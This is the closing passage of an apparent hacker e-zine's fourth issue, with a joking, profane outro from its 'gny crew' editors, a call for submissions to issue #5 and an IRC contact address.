- [01:13] <elchupathingy> that sounds depressing as hell
- We could go on, but that would only embarrass us more. And everyone knows the first rule to being a
- sooper l33t h4xx0r klan is to only portray yourselves as FUCKING HARDCORE MOTHERFUCKERS.
- Yeah, whatever.
- So, yeah. Looks like the end of issue #4 - hope you liked it. Like always, if you'd like to submit
- content for future issues, our contact information is in the introduction. The call for papers for
- issue #5 is now open, so get your crap in.
- See you in the summer.
- <3, the gny crew
- irc.gonullyourself.org +6697 #gny
- [==================================================================================================]
Add Comment
Please, Sign In to add comment